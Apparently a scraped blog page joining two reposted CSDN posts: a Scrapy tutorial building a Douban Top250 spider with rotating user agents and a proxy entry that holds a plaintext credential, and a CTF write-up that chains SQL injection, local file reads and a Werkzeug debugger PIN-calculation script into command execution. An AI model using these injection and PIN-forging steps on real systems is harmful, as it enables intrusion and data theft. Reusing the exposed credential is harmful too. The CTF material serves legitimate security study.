初识scrapy,以及豆瓣爬虫实例

流行的爬虫框架,scrapy

框架,少量代码,迅速抓取

请求模块,spider爬虫模块(需要手写),调度器模块,管道数据保存模块(需要手写),引擎

每个模块只和引擎做交互

创建爬虫框架

 """scrapy startproject myspider"""

创建爬虫

"""scrapy genspider itcast itcast.cn"""
 """scrapy crawl itcast --nolog"""

翻页构造一个Request对象,确定url地址

直接携带cookies

模拟登录

post请求

中间件(距离那个近就叫什么中间件)

预处理request和response对象

代理ip

对请求进行定制化操作

中间件写到middlewares.py文件中,平时写的是下载器中间件

下载器中间件

爬虫中间件

中间件的使用方法,在middlewares.py中定义中间类

process_response,process_request两个方法

crawlspider的作用:crawlspider可以按照规则自动获取连接

crawlspider爬虫的创建:scrapy genspider -t crawl tencent hr.tencent.com

crawlspider中rules的使用:

rules是一个元组或者是列表,包含的是Rule对象

Rule表示规则,其中包含LinkExtractor,callback和follow等参数

LinkExtractor:连接提取器,可以通过正则或者是xpath来进行url地址的匹配

callback :表示经过连接提取器提取出来的url地址响应的回调函数,可以没有,没有表示响应不会进行回调函数的处理

follow:连接提取器提取的url地址对应的响应是否还会继续被rules中的规则进行提取,True表示会,Flase表示不会

经常应用于数据在一个页面上采集

1.编写普通爬虫

(1).创建项目

(2).明确目标

(3).创建爬虫

(4).保存内容

2.改造分布式爬虫

(1).改爬虫

1.导入scrapy_redis中的分布式爬虫类

2.继承类

3.注销 start_urls & allowed–domains

4.设置redis_key获取start_urls

5.配置__ints__获取允许的域

(2).改造配置文件

cop配置参数

言归正住,下面解释一下利用scrapy制作的豆瓣250小爬虫

items.py

import scrapy

class DoubanItem(scrapy.Item):
    # define the fields for your item here like:
    name = scrapy.Field()
    pass

middlewares,py

# -*- coding: utf-8 -*-

# Define here the models for your spider middleware
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/spider-middleware.html
import random
from Douban.settings import USER_AGENT_LIST,PROXY_LIST
from scrapy import signals
import base64

# 定义一个中间件类
class RandomUserAgent(object):

    def process_request(self, request, spider):

        # print(request.headers['User-Agent'])
        ua = random.choice(USER_AGENT_LIST)
        request.headers['User-Agent'] = ua

class RandomProxy(object):

    def process_request(self, request, spider):
        proxy = random.choice(PROXY_LIST)
        print(proxy)
        if 'user_passwd' in proxy:
            # 对账号密码进行编码,python3中base64编码的数据必须是bytes类型,所以需要encode
            b64_up = base64.b64encode(proxy['user_passwd'].encode())
            # 设置认证
            request.headers['Proxy-Authorization'] = 'Basic ' + b64_up.decode()
            # 设置代理
            request.meta['proxy'] = proxy['ip_port']
        else:
            # 设置代理
            request.meta['proxy'] = proxy['ip_port']

pipelines.py

​
# -*- coding: utf-8 -*-

# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html

class DoubanPipeline(object):
    def process_item(self, item, spider):
        return item

​
# -*- coding: utf-8 -*-

# Scrapy settings for Douban project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
#     http://doc.scrapy.org/en/latest/topics/settings.html
#     http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#     http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html

BOT_NAME = 'Douban'

SPIDER_MODULES = ['Douban.spiders']
NEWSPIDER_MODULE = 'Douban.spiders'

# Crawl responsibly by identifying yourself (and your website) on the user-agent
USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'

USER_AGENT_LIST = [
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5 ",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14 ",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7 ",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 ",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre ",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.8 (KHTML, like Gecko) Beamrise/17.2.0.9 Chrome/17.0.939.0 Safari/535.8 ",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba"
]

PROXY_LIST =[
   {"ip_port": "123.207.53.84:16816", "user_passwd": "morganna_mode_g:ggc22qxp"},
   # {"ip_port": "122.234.206.43:9000"},
]

# Obey robots.txt rules
# ROBOTSTXT_OBEY = True

# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32

# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16

# Disable cookies (enabled by default)
#COOKIES_ENABLED = False

# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False

# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
#   'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
#   'Accept-Language': 'en',
#}

# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
#    'Douban.middlewares.DoubanSpiderMiddleware': 543,
#}

# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
DOWNLOADER_MIDDLEWARES = {
   # 'Douban.middlewares.MyCustomDownloaderMiddleware': 543,
   # 'Douban.middlewares.RandomUserAgent': 543,
   'Douban.middlewares.RandomProxy': 543,
}

# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
#    'scrapy.extensions.telnet.TelnetConsole': None,
#}

# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
#    'Douban.pipelines.DoubanPipeline': 300,
#}

# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False

# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'

movie.py

# -*- coding: utf-8 -*-
import scrapy
from Douban.items import DoubanItem

class MovieSpider(scrapy.Spider):
    name = 'movie'
    allowed_domains = ['douban.com']
    start_urls = ['https://movie.douban.com/top250']

    def parse(self, response):
        print(response.request.headers['User-Agent'])

        movie_list = response.xpath('//*[@id="content"]/div/div[1]/ol/li/div/div[2]')

        # print(len(movie_list))

        for movie in movie_list:
            item = DoubanItem()

            item['name'] = movie.xpath('./div[1]/a/span[1]/text()').extract_first()

            yield item

        next_url = response.xpath('//*[@id="content"]/div/div[1]/div[2]/span[3]/a/@href').extract_first()
        if next_url != None:
            next_url = response.urljoin(next_url)
            yield scrapy.Request(url=next_url)

最后cd到程序目录

 """scrapy crawl movie --nolog"""

Original: https://blog.csdn.net/weixin_53227758/article/details/119080482
Author: 小赵呢
Title: 初识scrapy,以及豆瓣爬虫实例



相关阅读

Title: oh-my-notepro

知识点:求pin码

登录页面后测试可以发现在note_id处可以sql注入。

初识scrapy,以及豆瓣爬虫实例
%27union%20select%201,2,3,version(),(select%20group_concat(username,0x3a,password)%20from%20users);%23

可以得到用户名和密码,但用处不大。

初识scrapy,以及豆瓣爬虫实例

pin码

可以用pin码登录控制台来

初识scrapy,以及豆瓣爬虫实例

3.8的pin码计算脚本如下,需要以下信息:

  1. username,用户名,可以读取/etc/passwd得到
  2. modname,默认值为flask.app
  3. appname,默认值为Flask
  4. moddir,flask库下app.py的绝对路径(报错得到)
  5. uuidnode,当前网络的mac地址的十进制数,通过文件/sys/class/net/eth0/address得到16进制结果,转化为10进制进行计算
  6. machine_id,docker机器id,读取/etc/machine-id ,/proc/sys/kernel/random/boot_id ,/proc/self/cgroup,前两个任选一个与最后一个拼接

; app.py 路径

可以再报错处看

初识scrapy,以及豆瓣爬虫实例

读mac

';create table bbb(name varchar(1000));load data local infile "/sys/class/net/eth0/address" into table ctf.bbb;%23

'union select 1,2,3,4,(select group_concat(name) from ctf.bbb);%23

再转成16进制


print(int('0242ac120003',16))

读/etc/machine-id

';create table machine(name varchar(1000));load data local infile "/etc/machine-id" into table ctf.machine;%23

'union select 1,2,3,4,(select GROUP_CONCAT(name) from ctf.machine)%23

读/proc/self/cgroup

';create table cc(name varchar(1000));load data local infile "/proc/self/cgroup" into table ctf.cc;%23

'union select 1,2,3,4,(select group_concat(name) from ctf.cc);%23

计算pin


import hashlib
from itertools import chain
probably_public_bits = [
    'ctf'
    'flask.app',
    'Flask',
    '/usr/local/lib/python3.8/site-packages/flask/app.py'
]

private_bits = [
    '2485377957891',

    '1cc402dd0e11d5ae18db04a6de87223d9cfbff4dca5ae8bd5f82dad5b7b30f43bc41fcde7cf41bdfa213e96595e05ff7'
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

拿flag

获得pin码后,到控制台执行命令

__import__("os").popen("cmd").read()

参考

1

2

Original: https://blog.csdn.net/shinygod/article/details/124329579
Author: succ3
Title: oh-my-notepro

原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/353556/

转载文章受原作者版权保护。转载请注明原作者出处!

(0)

大家都在看

最近整理资源【免费获取】:   👉 程序员最新必读书单  | 👏 互联网各方向面试题下载 | ✌️计算机核心资源汇总